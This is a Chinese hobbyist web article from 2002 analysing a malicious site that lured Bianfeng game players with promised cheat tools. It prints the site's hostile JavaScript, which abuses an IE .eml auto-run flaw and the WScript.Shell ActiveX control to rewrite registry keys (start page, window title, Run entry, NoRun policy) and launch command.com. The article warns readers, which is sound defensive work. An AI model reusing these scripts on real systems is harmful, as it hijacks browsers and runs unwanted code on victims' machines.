※黑客攻防指南※===>特别奉献==>某网站致命诱惑后面的技术阴谋!
某网站致命诱惑后面的技术阴谋!
    很多朋友一定知道边锋这个网络游戏吧!该游戏中的玩家以买卖其中的虚拟货币(俗称:银子)而谋取暴
利.据说中国每天这个网络游戏的虚拟货币的成交量在1亿人民币。当然这只是据说的…!但是的确有很多人热
衷这个游戏。(因为的确能赚到白花花的人民币啊…!真谗忍!)可是,有些人却想不劳而获通过不正当的手
段来赚取别人的"银子"。他们大多是以诱骗的方式发布广告,说什么只要用了他们的软件一天就能赚几千万。
(几千万啊…·折合成人民币也得几千块啊…!又有谁不会动心呢?)
前两天,一个朋友能过QQ给我传来了一个网址,说是这个网址一打开就有木马。在好奇心的驱使下我终于
忍不住打开了。(其实我只是想看看它的源文件而己)
我打开浏览器,输入xxx.xxx.xxx回车。1秒钟就打开了(速度还不错)。???鼠标变成了漏斗,显然是
在加载什么东东,接着一个程序开始下载(当然它并不是自动执行的)。我点了取消,关闭了那个下载的提示
。网页总算全打开了…!原来主要是介绍那个边锋游戏里面的一些作弊工具,什么边锋看牌器,什么算牌器,
什么什么,反正很多软件。还有相关的截图来证明这些软件的功能和使用方法。正在这个时侯我的监控系统的
警报响了,并提示说有个XXXX木马企图执行,但是已经被删除也了。哇噻!这是什么网站啊,看两眼就给我中
木马,要是真的下载了他的软件后果可真是…………!惨哪…!还是来研究一下他的源文件吧…!
我打开了写字板,仔细的看着冒着生命危险保存下来的源文件。由于我的水平也很菜所以有很多看不懂的
东东。Microsoft FrontPage 4.0好像是用这个软件做的。而且还用了CSS作了处理(水平不错嘛…!)。
<script language=javascript>
<!--
window.open('http://popme.163.com/diy/30.html','diy','width=294,height=264');
//--></script>
这一行就不用我说了吧?是网易免费空间的广告,倒…!也是穷人啊…!接着往下看。
"http://XXX.XXX.XXX/*****.eml" width=1 height=1
这一行东东很有趣哦!????????????在浏览器里输入那一行里的网址,果然打开了刚才自动下载的那个程序。
啊…!现在明白了…!ie5.x及以下版本的浏览器都有一个漏洞,网页中包含.eml文件时将自动执行其中的附件
。哈哈…!原来是这样啊…!现在不用了说了吧…!他就是利用这个漏洞,在你浏览这个网站时,就会自动下
载那个程序也就是他的木马。width=1 height=1这两个的意思就是最小化了吧…!应该是…!但是他的这个做
的还是不太高明。没有真正的实现程序隐藏执行。其实实现这个也不难,只要用一小段代码就可以了,什么代
码?不告诉你…!我可不希望大家都去做坏事,那样岂不天下大乱乎?闲言少叙,还是接着看他的代码吧…!
<script language=JavaScript>
function f()
{
var aa,ss;
aa=document.applets[0];
aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
aa.createInstance();
ss=aa.GetObject();
ss.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://xxx.xxx.xxx/");
ss.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 00, "REG_BINARY");
ss.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "http://xxx.xxx.xxx/******网——QQ:********");
ss.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "http://xxx.xxx.xxx/******网——QQ:********");
ss.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
ss.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\run","http://xxx.xxx.xxx/");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>
看来这家伙真是狠人啊…!竟然还敢把QQ号打在上面。而且修改人家的浏览器,真不道德哦!
<SCRIPT>
function runcmd()
{
a=document.applets[0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
wsh=a.GetObject();
wsh.Run('command.com',false,1);
}
setTimeout('runcmd()',10); </SCRIPT>
他写入这个文件是什么意思呢?难道是为了让程序下次自动运行?手法不高…!
其它的就都是一些垃圾了,没有什么研究的价值了…!

    其实,像这样的网站在边锋的大厅随处可见,他们的手法并不算高明,有的冒充网管发布广告信息,有的
则是以美女靓照来引诱大家,但是最常见的就是这个以提供作弊工作软件为借口来让你去访问他们的网站。然
而很多人就是为了贪图便宜,以为用了他们的软件能日进斗金,结果别人的银子没有赚到,自己的却被盗了!
希望大家不要随便看别人给发来的网址,否则…嘿嘿…不用我说了吧!啊?…!

主目录 分目录

Copyright By「黑白网络工作室」2002 All Rights Reserve